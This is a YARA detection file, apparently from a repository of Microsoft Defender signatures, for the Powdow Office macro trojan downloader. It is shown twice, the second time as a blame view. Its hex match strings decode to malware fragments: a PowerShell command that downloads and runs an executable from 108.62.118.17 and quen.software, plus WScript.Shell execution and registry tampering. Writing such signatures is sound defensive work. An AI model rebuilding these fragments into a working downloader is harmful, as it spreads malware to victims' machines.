DefenderYara/TrojanDownloader/O97M/Powdow/TrojanDownloader_O97M_Powdo...


rule TrojanDownloader_O97M_Powdow_RSL_MTB{
	meta:
		description = "TrojanDownloader:O97M/Powdow.RSL!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "
		
	strings :
		$a_00_0 = {34 34 36 46 37 37 36 45 36 43 36 46 36 31 36 34 34 36 36 39 36 43 36 35 32 38 32 37 36 38 37 34 37 34 37 30 33 41 32 46 32 46 33 31 33 30 33 38 32 45 33 36 33 32 32 45 33 31 33 31 33 38 32 45 33 31 33 37 32 46 34 35 37 32 33 37 34 38 35 46 36 32 36 33 33 36 34 37 32 45 36 44 37 33 36 39 32 37 32 43 32 38 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 32 39 } //1 446F776E6C6F616446696C652827687474703A2F2F3130382E36322E3131382E31372F457237485F626336472E6D7369272C2824656E763A6170706461746129
		$a_00_1 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } //1 CreateObject("WScript.Shell")
		$a_00_2 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 45 78 63 65 6c 2e 41 70 70 6c 69 63 61 74 69 6f 6e 22 29 2e 57 61 69 74 20 28 4e 6f 77 20 2b 20 54 69 6d 65 56 61 6c 75 65 28 22 30 3a 30 30 3a 30 35 22 29 29 } //1 CreateObject("Excel.Application").Wait (Now + TimeValue("0:00:05"))
		$a_00_3 = {52 65 67 44 65 6c 65 74 65 20 71 77 64 77 77 78 71 28 22 34 38 34 42 34 33 35 35 35 43 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 43 37 37 36 39 36 45 36 34 36 39 37 32 22 29 } //1 RegDelete qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972")
		$a_00_4 = {73 53 74 72 20 2b 20 43 68 72 28 43 4c 6e 67 28 22 26 48 22 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 32 29 29 29 } //1 sStr + Chr(CLng("&H" & Mid(str, i, 2)))
		$a_00_5 = {71 77 64 77 71 2e 52 75 6e 20 28 78 29 } //1 qwdwq.Run (x)
	condition:
		((#a_00_0  & 1)*1+(#a_00_1  & 1)*1+(#a_00_2  & 1)*1+(#a_00_3  & 1)*1+(#a_00_4  & 1)*1+(#a_00_5  & 1)*1) >=6
 
}
rule TrojanDownloader_O97M_Powdow_RSL_MTB_2{
	meta:
		description = "TrojanDownloader:O97M/Powdow.RSL!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "
		
	strings :
		$a_00_0 = {34 34 36 46 37 37 36 45 36 43 36 46 36 31 36 34 34 36 36 39 36 43 36 35 32 38 32 37 36 38 37 34 37 34 37 30 33 41 32 46 32 46 37 31 37 35 36 35 36 45 32 45 37 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 32 46 37 30 37 35 37 34 37 34 37 39 36 35 36 34 32 45 36 35 37 38 36 35 32 37 32 43 32 38 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 32 39 } //1 446F776E6C6F616446696C652827687474703A2F2F7175656E2E736F6674776172652F707574747965642E657865272C2824656E763A6170706461746129
		$a_00_1 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } //1 CreateObject("WScript.Shell")
		$a_00_2 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 45 78 63 65 6c 2e 41 70 70 6c 69 63 61 74 69 6f 6e 22 29 2e 57 61 69 74 20 28 4e 6f 77 20 2b 20 54 69 6d 65 56 61 6c 75 65 28 22 30 3a 30 30 3a 30 35 22 29 29 } //1 CreateObject("Excel.Application").Wait (Now + TimeValue("0:00:05"))
		$a_00_3 = {52 65 67 44 65 6c 65 74 65 20 71 77 64 77 77 78 71 28 22 34 38 34 42 34 33 35 35 35 43 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 43 37 37 36 39 36 45 36 34 36 39 37 32 22 29 } //1 RegDelete qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972")
		$a_00_4 = {71 77 64 77 71 2e 52 75 6e 20 28 78 29 } //1 qwdwq.Run (x)
		$a_00_5 = {73 53 74 72 20 3d 20 73 53 74 72 20 2b 20 43 68 72 28 43 4c 6e 67 28 22 26 48 22 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 32 29 29 29 } //1 sStr = sStr + Chr(CLng("&H" & Mid(str, i, 2)))
	condition:
		((#a_00_0  & 1)*1+(#a_00_1  & 1)*1+(#a_00_2  & 1)*1+(#a_00_3  & 1)*1+(#a_00_4  & 1)*1+(#a_00_5  & 1)*1) >=6
 
}
rule TrojanDownloader_O97M_Powdow_RSL_MTB_3{
	meta:
		description = "TrojanDownloader:O97M/Powdow.RSL!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "
		
	strings :
		$a_00_0 = {34 34 36 46 37 37 36 45 36 43 36 46 36 31 36 34 34 36 36 39 36 43 36 35 32 38 32 37 36 38 37 34 37 34 37 30 33 41 32 46 32 46 37 31 37 35 36 35 36 45 32 45 37 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 32 46 37 33 32 45 36 35 37 38 36 35 32 37 32 43 32 38 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 32 39 32 42 32 37 35 43 37 30 35 38 34 38 35 41 35 30 32 45 36 35 37 38 36 35 32 37 32 39 33 42 35 33 37 34 36 31 37 32 37 34 32 44 35 33 36 43 36 35 36 35 37 30 32 30 33 32 33 42 32 30 35 33 37 34 36 31 37 32 37 34 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 35 43 37 30 35 38 34 38 35 41 35 30 32 45 36 35 37 38 36 35 33 42 32 36 35 32 34 35 34 44 } //1 446F776E6C6F616446696C652827687474703A2F2F7175656E2E736F6674776172652F732E657865272C2824656E763A61707064617461292B275C7058485A502E65786527293B53746172742D536C65657020323B2053746172742D50726F636573732024656E763A617070646174615C7058485A502E6578653B2652454D
		$a_00_1 = {71 77 64 77 71 2e 52 65 67 57 72 69 74 65 20 71 77 64 77 77 78 71 28 22 34 38 34 42 34 33 35 35 35 43 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 43 37 37 36 39 36 45 36 34 36 39 37 32 22 29 } //1 qwdwq.RegWrite qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972")
		$a_00_2 = {41 70 70 6c 69 63 61 74 69 6f 6e 2e 57 61 69 74 20 28 4e 6f 77 20 2b 20 54 69 6d 65 56 61 6c 75 65 28 22 30 3a 30 30 3a 30 35 22 29 29 } //1 Application.Wait (Now + TimeValue("0:00:05"))
		$a_00_3 = {71 77 64 77 71 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } //1 qwdwq = CreateObject("WScript.Shell")
		$a_00_4 = {73 53 74 72 20 2b 20 43 68 72 28 43 4c 6e 67 28 22 26 48 22 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 32 29 29 29 } //1 sStr + Chr(CLng("&H" & Mid(str, i, 2)))
		$a_00_5 = {71 77 64 77 71 2e 52 75 6e 20 28 78 29 } //1 qwdwq.Run (x)
	condition:
		((#a_00_0  & 1)*1+(#a_00_1  & 1)*1+(#a_00_2  & 1)*1+(#a_00_3  & 1)*1+(#a_00_4  & 1)*1+(#a_00_5  & 1)*1) >=6
 
}
init 2024-02-05 06:12:47 -08:00
			`rule TrojanDownloader_O97M_Powdow_RSL_MTB{`
			`meta:`
fix condition 2024-07-06 23:13:08 -07:00			`description = "TrojanDownloader:O97M/Powdow.RSL!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "`
init 2024-02-05 06:12:47 -08:00
			`strings :`
fix condition 2024-07-06 23:13:08 -07:00			$a_00_0 = {34 34 36 46 37 37 36 45 36 43 36 46 36 31 36 34 34 36 36 39 36 43 36 35 32 38 32 37 36 38 37 34 37 34 37 30 33 41 32 46 32 46 33 31 33 30 33 38 32 45 33 36 33 32 32 45 33 31 33 31 33 38 32 45 33 31 33 37 32 46 34 35 37 32 33 37 34 38 35 46 36 32 36 33 33 36 34 37 32 45 36 44 37 33 36 39 32 37 32 43 32 38 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 32 39 } //1 446F776E6C6F616446696C652827687474703A2F2F3130382E36322E3131382E31372F457237485F626336472E6D7369272C2824656E763A6170706461746129
			`$a_00_1 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } //1 CreateObject("WScript.Shell")`
			`$a_00_2 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 45 78 63 65 6c 2e 41 70 70 6c 69 63 61 74 69 6f 6e 22 29 2e 57 61 69 74 20 28 4e 6f 77 20 2b 20 54 69 6d 65 56 61 6c 75 65 28 22 30 3a 30 30 3a 30 35 22 29 29 } //1 CreateObject("Excel.Application").Wait (Now + TimeValue("0:00:05"))`
			`$a_00_3 = {52 65 67 44 65 6c 65 74 65 20 71 77 64 77 77 78 71 28 22 34 38 34 42 34 33 35 35 35 43 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 43 37 37 36 39 36 45 36 34 36 39 37 32 22 29 } //1 RegDelete qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972")`
			`$a_00_4 = {73 53 74 72 20 2b 20 43 68 72 28 43 4c 6e 67 28 22 26 48 22 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 32 29 29 29 } //1 sStr + Chr(CLng("&H" & Mid(str, i, 2)))`
			`$a_00_5 = {71 77 64 77 71 2e 52 75 6e 20 28 78 29 } //1 qwdwq.Run (x)`
init 2024-02-05 06:12:47 -08:00			`condition:`
fix condition 2024-07-06 23:13:08 -07:00			`((#a_00_0 & 1)1+(#a_00_1 & 1)1+(#a_00_2 & 1)1+(#a_00_3 & 1)1+(#a_00_4 & 1)1+(#a_00_5 & 1)1) >=6`
init 2024-02-05 06:12:47 -08:00
			`}`
			`rule TrojanDownloader_O97M_Powdow_RSL_MTB_2{`
			`meta:`
fix condition 2024-07-06 23:13:08 -07:00			`description = "TrojanDownloader:O97M/Powdow.RSL!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "`
init 2024-02-05 06:12:47 -08:00
			`strings :`
fix condition 2024-07-06 23:13:08 -07:00			$a_00_0 = {34 34 36 46 37 37 36 45 36 43 36 46 36 31 36 34 34 36 36 39 36 43 36 35 32 38 32 37 36 38 37 34 37 34 37 30 33 41 32 46 32 46 37 31 37 35 36 35 36 45 32 45 37 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 32 46 37 30 37 35 37 34 37 34 37 39 36 35 36 34 32 45 36 35 37 38 36 35 32 37 32 43 32 38 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 32 39 } //1 446F776E6C6F616446696C652827687474703A2F2F7175656E2E736F6674776172652F707574747965642E657865272C2824656E763A6170706461746129
			`$a_00_1 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } //1 CreateObject("WScript.Shell")`
			`$a_00_2 = {43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 45 78 63 65 6c 2e 41 70 70 6c 69 63 61 74 69 6f 6e 22 29 2e 57 61 69 74 20 28 4e 6f 77 20 2b 20 54 69 6d 65 56 61 6c 75 65 28 22 30 3a 30 30 3a 30 35 22 29 29 } //1 CreateObject("Excel.Application").Wait (Now + TimeValue("0:00:05"))`
			`$a_00_3 = {52 65 67 44 65 6c 65 74 65 20 71 77 64 77 77 78 71 28 22 34 38 34 42 34 33 35 35 35 43 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 43 37 37 36 39 36 45 36 34 36 39 37 32 22 29 } //1 RegDelete qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972")`
			`$a_00_4 = {71 77 64 77 71 2e 52 75 6e 20 28 78 29 } //1 qwdwq.Run (x)`
			`$a_00_5 = {73 53 74 72 20 3d 20 73 53 74 72 20 2b 20 43 68 72 28 43 4c 6e 67 28 22 26 48 22 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 32 29 29 29 } //1 sStr = sStr + Chr(CLng("&H" & Mid(str, i, 2)))`
init 2024-02-05 06:12:47 -08:00			`condition:`
fix condition 2024-07-06 23:13:08 -07:00			`((#a_00_0 & 1)1+(#a_00_1 & 1)1+(#a_00_2 & 1)1+(#a_00_3 & 1)1+(#a_00_4 & 1)1+(#a_00_5 & 1)1) >=6`
init 2024-02-05 06:12:47 -08:00
			`}`
			`rule TrojanDownloader_O97M_Powdow_RSL_MTB_3{`
			`meta:`
fix condition 2024-07-06 23:13:08 -07:00			`description = "TrojanDownloader:O97M/Powdow.RSL!MTB,SIGNATURE_TYPE_MACROHSTR_EXT,06 00 06 00 06 00 00 "`
init 2024-02-05 06:12:47 -08:00
			`strings :`
fix condition 2024-07-06 23:13:08 -07:00			$a_00_0 = {34 34 36 46 37 37 36 45 36 43 36 46 36 31 36 34 34 36 36 39 36 43 36 35 32 38 32 37 36 38 37 34 37 34 37 30 33 41 32 46 32 46 37 31 37 35 36 35 36 45 32 45 37 33 36 46 36 36 37 34 37 37 36 31 37 32 36 35 32 46 37 33 32 45 36 35 37 38 36 35 32 37 32 43 32 38 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 32 39 32 42 32 37 35 43 37 30 35 38 34 38 35 41 35 30 32 45 36 35 37 38 36 35 32 37 32 39 33 42 35 33 37 34 36 31 37 32 37 34 32 44 35 33 36 43 36 35 36 35 37 30 32 30 33 32 33 42 32 30 35 33 37 34 36 31 37 32 37 34 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 34 36 35 36 45 37 36 33 41 36 31 37 30 37 30 36 34 36 31 37 34 36 31 35 43 37 30 35 38 34 38 35 41 35 30 32 45 36 35 37 38 36 35 33 42 32 36 35 32 34 35 34 44 } //1 446F776E6C6F616446696C652827687474703A2F2F7175656E2E736F6674776172652F732E657865272C2824656E763A61707064617461292B275C7058485A502E65786527293B53746172742D536C65657020323B2053746172742D50726F636573732024656E763A617070646174615C7058485A502E6578653B2652454D
			`$a_00_1 = {71 77 64 77 71 2e 52 65 67 57 72 69 74 65 20 71 77 64 77 77 78 71 28 22 34 38 34 42 34 33 35 35 35 43 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 35 43 37 37 36 39 36 45 36 34 36 39 37 32 22 29 } //1 qwdwq.RegWrite qwdwwxq("484B43555C456E7669726F6E6D656E745C77696E646972")`
			`$a_00_2 = {41 70 70 6c 69 63 61 74 69 6f 6e 2e 57 61 69 74 20 28 4e 6f 77 20 2b 20 54 69 6d 65 56 61 6c 75 65 28 22 30 3a 30 30 3a 30 35 22 29 29 } //1 Application.Wait (Now + TimeValue("0:00:05"))`
			`$a_00_3 = {71 77 64 77 71 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 } //1 qwdwq = CreateObject("WScript.Shell")`
			`$a_00_4 = {73 53 74 72 20 2b 20 43 68 72 28 43 4c 6e 67 28 22 26 48 22 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 32 29 29 29 } //1 sStr + Chr(CLng("&H" & Mid(str, i, 2)))`
			`$a_00_5 = {71 77 64 77 71 2e 52 75 6e 20 28 78 29 } //1 qwdwq.Run (x)`
init 2024-02-05 06:12:47 -08:00			`condition:`
fix condition 2024-07-06 23:13:08 -07:00			`((#a_00_0 & 1)1+(#a_00_1 & 1)1+(#a_00_2 & 1)1+(#a_00_3 & 1)1+(#a_00_4 & 1)1+(#a_00_5 & 1)1) >=6`
init 2024-02-05 06:12:47 -08:00
			`}`